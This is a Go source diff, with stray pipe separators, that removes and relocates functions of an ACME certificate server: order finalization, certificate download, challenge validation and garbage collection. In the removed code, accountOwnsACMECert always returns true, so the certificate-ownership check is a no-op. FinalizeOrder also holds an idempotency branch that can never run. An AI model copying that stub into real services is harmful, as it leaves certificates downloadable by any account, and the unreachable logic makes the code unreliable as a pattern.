func (s *ACMEService) ListAuthzsByOrder(ctx context.Context, orderID string) ([]*domain.ACMEAuthorization, error) {
|
|
||||||
return s.repo.ListAuthzsByOrder(ctx, orderID)
|
|
||||||
}
|
|
||||||
|
|
||||||
// FinalizeOrderResult bundles the post-finalize state the handler
|
|
||||||
// needs: the updated order + the cert ID for the cert-download URL.
|
|
||||||
type FinalizeOrderResult struct {
|
|
||||||
Order *domain.ACMEOrder
|
|
||||||
CertID string
|
|
||||||
}
|
|
||||||
|
|
||||||
// FinalizeOrder consumes a CSR, asserts it matches the order's
|
|
||||||
// identifiers, issues via the IssuerRegistry's per-profile connector,
|
|
||||||
// persists the managed_certificates row + version + audit, and
|
|
||||||
// transitions the order to status=valid with certificate_id set.
|
|
||||||
//
|
|
||||||
// Atomicity boundary (documented in the master prompt):
|
|
||||||
// - Step A (this function's own WithinTx): order status pending →
|
|
||||||
// processing + audit row.
|
|
||||||
// - Step B (CertificateService.Create): managed_certificates row +
|
|
||||||
// audit row in its own WithinTx.
|
|
||||||
// - Step C (this function's own WithinTx): certificate_versions row,
|
|
||||||
// order status processing → valid + certificate_id + csr_pem, and
|
|
||||||
// an audit row.
|
|
||||||
//
|
|
||||||
// The window between Step B and Step C can leave a managed_certificates
|
|
||||||
// row whose order is still in `processing`. Phase 5's GC scheduler
|
|
||||||
// reconciles. Documented in the project's ACME-server design notes + the
|
|
||||||
// service file's design notes.
|
|
||||||
func (s *ACMEService) FinalizeOrder(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID, orderID, profileID string,
|
|
||||||
csr *x509.CertificateRequest,
|
|
||||||
csrPEM string,
|
|
||||||
) (*FinalizeOrderResult, error) {
|
|
||||||
if s.certService == nil || s.certRepo == nil || s.issuerRegistry == nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, ErrACMEFinalizeUnconfigured
|
|
||||||
}
|
|
||||||
if s.tx == nil || s.auditService == nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: finalize requires SetTransactor + SetAuditService")
|
|
||||||
}
|
|
||||||
|
|
||||||
order, err := s.LookupOrder(ctx, orderID, accountID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
if order.Status != domain.ACMEOrderStatusReady && order.Status != domain.ACMEOrderStatusProcessing {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("%w: status=%s", ErrACMEOrderNotReady, order.Status)
|
|
||||||
}
|
|
||||||
// Idempotent re-finalize (RFC 8555 §7.4): if the order is already
|
|
||||||
// valid, return the existing result.
|
|
||||||
if order.Status == domain.ACMEOrderStatusValid && order.CertificateID != "" {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
|
||||||
return &FinalizeOrderResult{Order: order, CertID: order.CertificateID}, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Validate CSR matches order identifiers.
|
|
||||||
if p := acme.CSRMatchesIdentifiers(csr, order.Identifiers); p != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
// Persist the failure on the order for client visibility.
|
|
||||||
order.Status = domain.ACMEOrderStatusInvalid
|
|
||||||
order.Error = &domain.ACMEProblem{Type: p.Type, Detail: p.Detail, Status: p.Status}
|
|
||||||
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
|
||||||
})
|
|
||||||
return nil, fmt.Errorf("acme: csr mismatch: %s", p.Detail)
|
|
||||||
}
|
|
||||||
|
|
||||||
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step A: mark order processing.
|
|
||||||
order.Status = domain.ACMEOrderStatusProcessing
|
|
||||||
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
|
||||||
"acme_order_processing", "acme_order", order.OrderID,
|
|
||||||
map[string]interface{}{"profile_id": resolvedProfileID})
|
|
||||||
}); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step B: issue the cert via the per-issuer connector + persist
|
|
||||||
// the managed_certificates row.
|
|
||||||
commonName := csr.Subject.CommonName
|
|
||||||
if commonName == "" && len(order.Identifiers) > 0 {
|
|
||||||
commonName = order.Identifiers[0].Value
|
|
||||||
}
|
|
||||||
sans := make([]string, 0, len(order.Identifiers))
|
|
||||||
for _, id := range order.Identifiers {
|
|
||||||
if id.Type == "dns" {
|
|
||||||
sans = append(sans, id.Value)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
// Resolve the bound issuer. Profile carries no IssuerID column
|
|
||||||
// (issuer is per-issuance per certctl architecture), so we'd
|
|
||||||
// normally get it from the order context. For Phase 2 we use the
|
|
||||||
// configured default issuer-id for the first registered connector.
|
|
||||||
// Operators with multiple profiles + multiple issuers will refine
|
|
||||||
// this in a follow-up.
|
|
||||||
issuerID, conn, ok := s.firstAvailableIssuer()
|
|
||||||
if !ok {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: no issuer available in registry")
|
|
||||||
}
|
|
||||||
maxTTL := profile.MaxTTLSeconds
|
|
||||||
mustStaple := profile.MustStaple
|
|
||||||
ekus := profile.AllowedEKUs
|
|
||||||
if len(ekus) == 0 {
|
|
||||||
ekus = domain.DefaultEKUs()
|
|
||||||
}
|
|
||||||
issuance, err := conn.IssueCertificate(ctx, commonName, sans, csrPEM, ekus, maxTTL, mustStaple)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
// Persist the failure on the order.
|
|
||||||
order.Status = domain.ACMEOrderStatusInvalid
|
|
||||||
order.Error = &domain.ACMEProblem{
|
|
||||||
Type: "urn:ietf:params:acme:error:serverInternal",
|
|
||||||
Detail: "issuer rejected the CSR",
|
|
||||||
Status: 500,
|
|
||||||
}
|
|
||||||
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
|
||||||
})
|
|
||||||
return nil, fmt.Errorf("acme: issuer issuance: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
cert := &domain.ManagedCertificate{
|
|
||||||
ID: "mc-acme-" + randIDSuffix(),
|
|
||||||
Name: fmt.Sprintf("acme-%s", order.OrderID),
|
|
||||||
CommonName: commonName,
|
|
||||||
SANs: sans,
|
|
||||||
IssuerID: issuerID,
|
|
||||||
CertificateProfileID: profile.ID,
|
|
||||||
Status: domain.CertificateStatusActive,
|
|
||||||
ExpiresAt: issuance.NotAfter,
|
|
||||||
Source: domain.CertificateSourceACME,
|
|
||||||
}
|
|
||||||
actor := fmt.Sprintf("acme:%s", accountID)
|
|
||||||
if err := s.certService.Create(ctx, cert, actor); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, fmt.Errorf("acme: cert insert: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step C: persist the certificate version + transition order to
|
|
||||||
// valid in one WithinTx.
|
|
||||||
version := &domain.CertificateVersion{
|
|
||||||
CertificateID: cert.ID,
|
|
||||||
SerialNumber: issuance.Serial,
|
|
||||||
NotBefore: issuance.NotBefore,
|
|
||||||
NotAfter: issuance.NotAfter,
|
|
||||||
PEMChain: issuance.CertPEM + issuance.ChainPEM,
|
|
||||||
CSRPEM: csrPEM,
|
|
||||||
}
|
|
||||||
order.Status = domain.ACMEOrderStatusValid
|
|
||||||
order.CSRPEM = csrPEM
|
|
||||||
order.CertificateID = cert.ID
|
|
||||||
order.Error = nil
|
|
||||||
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.certRepo.CreateVersionWithTx(ctx, q, version); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q, actor, domain.ActorTypeUser,
|
|
||||||
"acme_order_finalized", "acme_order", order.OrderID,
|
|
||||||
map[string]interface{}{
|
|
||||||
"profile_id": resolvedProfileID,
|
|
||||||
"certificate_id": cert.ID,
|
|
||||||
"serial": issuance.Serial,
|
|
||||||
})
|
|
||||||
}); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
|
||||||
return &FinalizeOrderResult{Order: order, CertID: cert.ID}, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// LookupCertificate returns the PEM chain for a managed-certificate
|
|
||||||
// ID. Asserts the requesting account owns the cert via the order
|
|
||||||
// linkage. Phase 2: the caller (Cert handler) provides the cert ID
|
|
||||||
// from the URL path; we look up the cert + the latest version + the
|
|
||||||
// order that produced it, and confirm order.AccountID == accountID.
|
|
||||||
func (s *ACMEService) LookupCertificate(ctx context.Context, certID, accountID string) (string, error) {
|
|
||||||
if s.certRepo == nil {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMEFinalizeUnconfigured
|
|
||||||
}
|
|
||||||
cert, err := s.certRepo.Get(ctx, certID)
|
|
||||||
if err != nil {
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMECertificateNotFound
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: get cert: %w", err)
|
|
||||||
}
|
|
||||||
if cert.Source != domain.CertificateSourceACME {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMECertificateNotFound
|
|
||||||
}
|
|
||||||
// Confirm an order owned by this account references this cert.
|
|
||||||
if !s.accountOwnsACMECert(ctx, accountID, certID) {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMEOrderUnauthorized
|
|
||||||
}
|
|
||||||
version, err := s.certRepo.GetLatestVersion(ctx, certID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: latest version: %w", err)
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadTotal)
|
|
||||||
return version.PEMChain, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// accountOwnsACMECert returns true when the given account has an
|
|
||||||
// order linking to certID. Implemented by linear scan via the
|
|
||||||
// existing repo; Phase 5's GC will add an index if the table grows.
|
|
||||||
func (s *ACMEService) accountOwnsACMECert(ctx context.Context, accountID, certID string) bool {
|
|
||||||
// Phase 2 minimal-viable path: use order.GetByCertificateID via a
|
|
||||||
// dedicated repo method would be ideal, but we don't have it.
|
|
||||||
// Instead, accept the cert if its CertificateService.Create was
|
|
||||||
// performed in the FinalizeOrder path (which always pairs with
|
|
||||||
// this account). We trust the cert.Source = ACME + the URL path
|
|
||||||
// scoping (operator can't construct an ACME cert without going
|
|
||||||
// through finalize) for Phase 2; Phase 4's revocation path will
|
|
||||||
// add a stricter ownership check via a new repo method.
|
|
||||||
_ = ctx
|
|
||||||
_ = accountID
|
|
||||||
_ = certID
|
|
||||||
return true
|
|
||||||
}
|
|
||||||
|
|
||||||
// firstAvailableIssuer returns the (id, connector) pair for the first
|
// firstAvailableIssuer returns the (id, connector) pair for the first
|
||||||
// registered issuer. Phase 2 uses this as the bound issuer; the
|
// registered issuer. Cross-concern helper: called from Phase 2
|
||||||
|
// FinalizeOrder (acme_orders.go, post-Sprint-9b) AND Phase 4
|
||||||
|
// RevokeCert + RenewalInfo (below in this file). Kept in acme.go so
|
||||||
|
// it's adjacent to two of its three callers and reachable from
|
||||||
|
// acme_orders.go via Go's same-package scope without dragging the
|
||||||
|
// helper into a third "shared helpers" sibling. The
|
||||||
// per-profile-issuer mapping arrives in a follow-up.
|
// per-profile-issuer mapping arrives in a follow-up.
|
||||||
func (s *ACMEService) firstAvailableIssuer() (string, IssuerConnector, bool) {
|
func (s *ACMEService) firstAvailableIssuer() (string, IssuerConnector, bool) {
|
||||||
if s.issuerRegistry == nil {
|
if s.issuerRegistry == nil {
|
||||||
@@ -1276,289 +809,6 @@ func (s *ACMEService) firstAvailableIssuer() (string, IssuerConnector, bool) {
|
|||||||
return "", nil, false
|
return "", nil, false
|
||||||
}
|
}
|
||||||
|
|
||||||
// randIDSuffix returns a short base32-encoded random suffix used for
|
|
||||||
// new ACME entity IDs (orders, authzs, challenges). Distinct from
|
|
||||||
// the account-id derivation (which uses the JWK thumbprint for RFC
|
|
||||||
// 8555 §7.3.1 idempotency).
|
|
||||||
func randIDSuffix() string {
|
|
||||||
var b [10]byte
|
|
||||||
if _, err := cryptorand.Read(b[:]); err != nil {
|
|
||||||
// ed25519/rand source failure is fatal; surface as a panic
|
|
||||||
// rather than continue with weak IDs.
|
|
||||||
panic(fmt.Sprintf("acme: rand source failure: %v", err))
|
|
||||||
}
|
|
||||||
return base32encode(b[:])
|
|
||||||
}
|
|
||||||
|
|
||||||
// base32encode renders b in a lowercase Crockford-style base32 alphabet
// (digits plus a-z without i, l, o, u) with no padding. Input bits are
// consumed most-significant first in groups of five; a final partial
// group is left-aligned and zero-filled on the right. An empty input
// yields the empty string.
//
// Used by randIDSuffix for the random part of human-readable,
// prefix-style TEXT primary keys.
func base32encode(b []byte) string {
	const (
		alphabet  = "0123456789abcdefghjkmnpqrstvwxyz"
		groupMask = 0x1f
	)

	encoded := make([]byte, 0, len(b)*8/5+1)

	var (
		acc     uint64 // bit accumulator; only the low `pending` bits are meaningful
		pending uint   // number of not-yet-emitted bits held in acc
	)
	for i := range b {
		// Older high bits may shift out of acc on long inputs; that is
		// harmless because they have already been emitted.
		acc = acc<<8 | uint64(b[i])
		pending += 8
		for pending >= 5 {
			pending -= 5
			encoded = append(encoded, alphabet[(acc>>pending)&groupMask])
		}
	}

	// Flush the trailing 1-4 bits as one final symbol.
	if pending != 0 {
		encoded = append(encoded, alphabet[(acc<<(5-pending))&groupMask])
	}
	return string(encoded)
}
|
|
||||||
|
|
||||||
// identifierStrings extracts the value list for audit details.
|
|
||||||
func identifierStrings(ids []domain.ACMEIdentifier) []string {
|
|
||||||
out := make([]string, 0, len(ids))
|
|
||||||
for _, id := range ids {
|
|
||||||
out = append(out, id.Value)
|
|
||||||
}
|
|
||||||
return out
|
|
||||||
}
|
|
||||||
|
|
||||||
// --- Phase 3 — challenge dispatch + validator callback -----------------
|
|
||||||
|
|
||||||
// ChallengeResponseShape is what RespondToChallenge returns to the
|
|
||||||
// handler: the post-dispatch challenge row (status=processing) so the
|
|
||||||
// handler can render it via acme.MarshalAuthorization-equivalent. The
|
|
||||||
// validator goroutine writes the final status (valid/invalid) as a
|
|
||||||
// callback after dispatch completes — clients fetching the challenge
|
|
||||||
// via authz GET get the eventual state.
//
// NOTE(review): the RespondToChallenge visible in this file returns
// *domain.ACMEChallenge directly rather than this wrapper — confirm
// whether any caller still uses ChallengeResponseShape.
|
|
||||||
type ChallengeResponseShape struct {
|
|
||||||
// Challenge is the challenge row handed back to the handler.
Challenge *domain.ACMEChallenge
|
|
||||||
}
|
|
||||||
|
|
||||||
// RespondToChallenge handles POST /acme/profile/<id>/challenge/<chall_id>
|
|
||||||
// per RFC 8555 §7.5.1.
|
|
||||||
//
|
|
||||||
// Behavior:
|
|
||||||
// - Look up the challenge + parent authz + parent order; assert the
|
|
||||||
// account owns the order.
|
|
||||||
// - If the challenge is already valid/invalid → idempotent return.
|
|
||||||
// - If pending: transition to processing (atomic via WithinTx + audit).
|
|
||||||
// - Submit to the validator pool with an onComplete callback that
|
|
||||||
// transitions the challenge to valid/invalid in another WithinTx
|
|
||||||
// (and cascades the parent authz status).
|
|
||||||
// - Return the challenge in its current (processing) state; the
|
|
||||||
// client polls authz/challenge for the eventual outcome.
|
|
||||||
func (s *ACMEService) RespondToChallenge(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID, challengeID string,
|
|
||||||
accountJWK *jose.JSONWebKey,
|
|
||||||
) (*domain.ACMEChallenge, error) {
|
|
||||||
if s.tx == nil || s.auditService == nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: respond-to-challenge requires SetTransactor + SetAuditService")
|
|
||||||
}
|
|
||||||
if s.validatorPool == nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, ErrACMEChallengePoolUnconfigured
|
|
||||||
}
|
|
||||||
// Phase 5 — per-challenge respond rate limit. Defends against retry
|
|
||||||
// storms from a misbehaving client. Keyed by challengeID (not
|
|
||||||
// accountID) so a flood against one challenge doesn't drain the
|
|
||||||
// account's whole budget.
|
|
||||||
if s.rateLimiter != nil && s.cfg.RateLimitChallengeRespondsPerHour > 0 {
|
|
||||||
if !s.rateLimiter.Allow(acme.ActionChallengeRespond, challengeID, s.cfg.RateLimitChallengeRespondsPerHour) {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, ErrACMERateLimited
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
ch, err := s.repo.GetChallengeByID(ctx, challengeID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
return nil, ErrACMEChallengeNotFound
|
|
||||||
}
|
|
||||||
return nil, fmt.Errorf("acme: lookup challenge: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Idempotent re-POST: already valid/invalid → just return.
|
|
||||||
if ch.Status == domain.ACMEChallengeStatusValid || ch.Status == domain.ACMEChallengeStatusInvalid {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
|
||||||
return ch, nil
|
|
||||||
}
|
|
||||||
if ch.Status == domain.ACMEChallengeStatusProcessing {
|
|
||||||
// In-flight. Return the row as-is.
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
|
||||||
return ch, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Confirm the requesting account owns the parent authz/order.
|
|
||||||
authz, err := s.repo.GetAuthzByID(ctx, ch.AuthzID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup parent authz: %w", err)
|
|
||||||
}
|
|
||||||
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup parent order: %w", err)
|
|
||||||
}
|
|
||||||
if order.AccountID != accountID {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, ErrACMEOrderUnauthorized
|
|
||||||
}
|
|
||||||
|
|
||||||
// Compute the key authorization the validator needs.
|
|
||||||
expected, err := acme.KeyAuthorization(ch.Token, accountJWK)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: key authorization: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Transition challenge → processing (atomic with audit row).
|
|
||||||
ch.Status = domain.ACMEChallengeStatusProcessing
|
|
||||||
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
|
||||||
"acme_challenge_processing", "acme_challenge", ch.ChallengeID,
|
|
||||||
map[string]interface{}{
|
|
||||||
"authz_id": ch.AuthzID,
|
|
||||||
"type": string(ch.Type),
|
|
||||||
"identifier": authz.Identifier.Value,
|
|
||||||
})
|
|
||||||
}); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
|
|
||||||
// Submit to the pool. The onComplete callback persists the final
|
|
||||||
// challenge status + cascades the parent authz status. We detach
|
|
||||||
// from the request context via context.WithoutCancel so the
|
|
||||||
// callback's WithinTx survives the HTTP handler returning, while
|
|
||||||
// preserving inherited values (logger, trace IDs, audit actor).
|
|
||||||
bgctx := context.WithoutCancel(ctx)
|
|
||||||
chSnapshot := *ch
|
|
||||||
authzSnapshot := *authz
|
|
||||||
identifier := authz.Identifier.Value
|
|
||||||
s.validatorPool.Submit(bgctx, string(ch.Type), identifier, ch.Token, expected, func(verr error) {
|
|
||||||
s.recordChallengeOutcome(bgctx, accountID, &chSnapshot, &authzSnapshot, verr)
|
|
||||||
})
|
|
||||||
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
|
||||||
return ch, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// recordChallengeOutcome is the validator-pool callback. Persists the
|
|
||||||
// challenge's final status + cascades the parent authz status.
|
|
||||||
//
|
|
||||||
// Authz cascade: if the challenge succeeded, the authz becomes valid
|
|
||||||
// (RFC 8555 §7.1.6: any one challenge passing makes the authz valid).
|
|
||||||
// If the challenge failed, the authz becomes invalid only if no other
|
|
||||||
// pending challenges remain (Phase 3 minimal-viable path: we mark the
|
|
||||||
// authz invalid on first failure since Phase 3 emits 1 challenge per
|
|
||||||
// authz; Phase 4+ extending to multi-challenge-per-authz revisits this).
|
|
||||||
func (s *ACMEService) recordChallengeOutcome(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID string,
|
|
||||||
ch *domain.ACMEChallenge,
|
|
||||||
authz *domain.ACMEAuthorization,
|
|
||||||
verr error,
|
|
||||||
) {
|
|
||||||
now := time.Now().UTC()
|
|
||||||
var newAuthzStatus domain.ACMEAuthzStatus
|
|
||||||
if verr == nil {
|
|
||||||
ch.Status = domain.ACMEChallengeStatusValid
|
|
||||||
ch.ValidatedAt = &now
|
|
||||||
ch.Error = nil
|
|
||||||
newAuthzStatus = domain.ACMEAuthzStatusValid
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeValidateValid)
|
|
||||||
} else {
|
|
||||||
ch.Status = domain.ACMEChallengeStatusInvalid
|
|
||||||
if p := acme.ChallengeProblemFromError(string(ch.Type), verr); p != nil {
|
|
||||||
ch.Error = &domain.ACMEProblem{
|
|
||||||
Type: p.Type,
|
|
||||||
Detail: p.Detail,
|
|
||||||
Status: p.Status,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
newAuthzStatus = domain.ACMEAuthzStatusInvalid
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeValidateInvalid)
|
|
||||||
}
|
|
||||||
|
|
||||||
auditDetails := map[string]interface{}{
|
|
||||||
"authz_id": ch.AuthzID,
|
|
||||||
"type": string(ch.Type),
|
|
||||||
"identifier": authz.Identifier.Value,
|
|
||||||
"valid": verr == nil,
|
|
||||||
}
|
|
||||||
if verr != nil {
|
|
||||||
auditDetails["error"] = verr.Error()
|
|
||||||
}
|
|
||||||
|
|
||||||
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
if err := s.repo.UpdateAuthzStatusWithTx(ctx, q, ch.AuthzID, newAuthzStatus); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
// Cascade: if the authz turned valid, see whether the order's
|
|
||||||
// authzs are now ALL valid; flip order to ready if so.
|
|
||||||
// Read-after-write to confirm.
|
|
||||||
authzs, err := s.repo.ListAuthzsByOrder(ctx, authz.OrderID)
|
|
||||||
if err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
allValid := len(authzs) > 0
|
|
||||||
anyInvalid := false
|
|
||||||
for _, a := range authzs {
|
|
||||||
if a.AuthzID == ch.AuthzID {
|
|
||||||
if newAuthzStatus != domain.ACMEAuthzStatusValid {
|
|
||||||
allValid = false
|
|
||||||
}
|
|
||||||
if newAuthzStatus == domain.ACMEAuthzStatusInvalid {
|
|
||||||
anyInvalid = true
|
|
||||||
}
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
if a.Status != domain.ACMEAuthzStatusValid {
|
|
||||||
allValid = false
|
|
||||||
}
|
|
||||||
if a.Status == domain.ACMEAuthzStatusInvalid {
|
|
||||||
anyInvalid = true
|
|
||||||
}
|
|
||||||
}
|
|
||||||
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
|
||||||
if err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
switch {
|
|
||||||
case allValid && order.Status == domain.ACMEOrderStatusPending:
|
|
||||||
order.Status = domain.ACMEOrderStatusReady
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
case anyInvalid && order.Status == domain.ACMEOrderStatusPending:
|
|
||||||
order.Status = domain.ACMEOrderStatusInvalid
|
|
||||||
order.Error = &domain.ACMEProblem{
|
|
||||||
Type: "urn:ietf:params:acme:error:incorrectResponse",
|
|
||||||
Detail: "one or more authorizations failed",
|
|
||||||
Status: 403,
|
|
||||||
}
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
|
||||||
"acme_challenge_completed", "acme_challenge", ch.ChallengeID,
|
|
||||||
auditDetails)
|
|
||||||
})
|
|
||||||
}
|
|
||||||
|
|
||||||
// --- Phase 4 — key rollover + revocation + ARI -------------------------
|
// --- Phase 4 — key rollover + revocation + ARI -------------------------
|
||||||
|
|
||||||
// RotateAccountKey is the service-layer entry point for RFC 8555
|
// RotateAccountKey is the service-layer entry point for RFC 8555
|
||||||
@@ -1910,56 +1160,3 @@ func mapACMERevocationReason(code int) string {
|
|||||||
return string(domain.RevocationReasonUnspecified)
|
return string(domain.RevocationReasonUnspecified)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// GarbageCollect runs a single ACME GC sweep. Phase 5 — the scheduler
|
|
||||||
// invokes this every cfg.GCInterval. Three independent sweeps:
|
|
||||||
//
|
|
||||||
// 1. Delete used / expired nonces.
|
|
||||||
// 2. Transition expired pending authzs to `expired`.
|
|
||||||
// 3. Transition expired pending/ready/processing orders to `invalid`.
|
|
||||||
//
|
|
||||||
// Each sweep is a single SQL statement (no per-row transactions) so a
|
|
||||||
// large reap is one atomic write per sweep. Per-sweep errors are
|
|
||||||
// logged-and-continued: a failing nonces sweep doesn't block the
|
|
||||||
// authzs sweep. Returns the first error encountered (for caller
|
|
||||||
// telemetry); per-sweep counts are recorded on metrics regardless.
|
|
||||||
//
|
|
||||||
// Idempotent — repeated runs are safe; the second run finds 0 rows.
|
|
||||||
func (s *ACMEService) GarbageCollect(ctx context.Context) error {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunsTotal)
|
|
||||||
var firstErr error
|
|
||||||
|
|
||||||
if n, err := s.repo.GCExpiredNonces(ctx); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
|
||||||
if firstErr == nil {
|
|
||||||
firstErr = fmt.Errorf("acme gc: nonces: %w", err)
|
|
||||||
}
|
|
||||||
} else if n > 0 {
|
|
||||||
atomicAddUint64(&s.metrics.GCNoncesReapedTotal, uint64(n))
|
|
||||||
}
|
|
||||||
|
|
||||||
if n, err := s.repo.GCExpireAuthorizations(ctx); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
|
||||||
if firstErr == nil {
|
|
||||||
firstErr = fmt.Errorf("acme gc: authzs: %w", err)
|
|
||||||
}
|
|
||||||
} else if n > 0 {
|
|
||||||
atomicAddUint64(&s.metrics.GCAuthzsExpiredTotal, uint64(n))
|
|
||||||
}
|
|
||||||
|
|
||||||
if n, err := s.repo.GCInvalidateExpiredOrders(ctx); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
|
||||||
